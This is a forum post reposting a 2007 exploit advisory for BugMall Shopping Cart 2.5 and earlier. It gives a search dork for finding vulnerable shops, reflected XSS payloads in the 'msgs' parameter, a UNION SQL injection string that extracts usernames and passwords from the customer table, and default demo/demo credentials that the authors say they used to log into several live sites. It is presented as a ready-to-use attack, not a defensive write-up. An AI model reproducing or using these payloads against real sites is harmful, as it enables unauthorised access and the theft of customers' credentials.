Jump to content
hex

BugMall Shopping Cart 2.5 (SQL/XSS) Multiple Remote Vuln

By hex, in Exploituri

Recommended Posts

hex Newbie

hex

Posted
Posted

--==+================================================================================+==--

--==+ BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS +==--

--==+================================================================================+==--

AUTHOR: t0pP8uZz & xprog (Excellent Work xprog thanks :D)

SCRIPT DOWNLOAD: http://www.bug-mall.org/downloads/bugmall.zip

ORIGINAL ADVISORY CAN BE FOUND HERE: http://www.h4cky0u.org/viewtopic.php?t=26834

SITE: http://www.bug-mall.org

DORK: Powered by Bug Software intext:Your Cart Contains

EXPLOITS:

EXPLOIT 1: http://www.site.com/BugMallPAth/index.php?msgs=[html, JAVASCRIPT]

EXPLOIT 2: The basic search box is vulnerable to sql injection, check examples for detail.

EXPLOIT 3: The script seems to have a default login, username:demo password: demo, we have tried this on several sites

and sucsefully logged in.

EXAMPLES:

EXAMPLE 1 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<html><body>VULN BY

t0pP8uZz

h4cky0u.org</body><html>

EXAMPLE 2 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<script>alert("XSS")</script>

EXAMPLE 3: Paste following into search box

' and 1=2 UNION ALL SELECT 1,2,3,4,concat(username,':',password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 from clientes/*

Note: Some servers may be running older version of MYSQL and make it harder to inject without UNION.

GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net

FROM GM!: Kw3[R]ln get over it :D.

--==+================================================================================+==--

--==+ BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS +==--

--==+================================================================================+==--

# milw0rm.com [2007-06-25]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...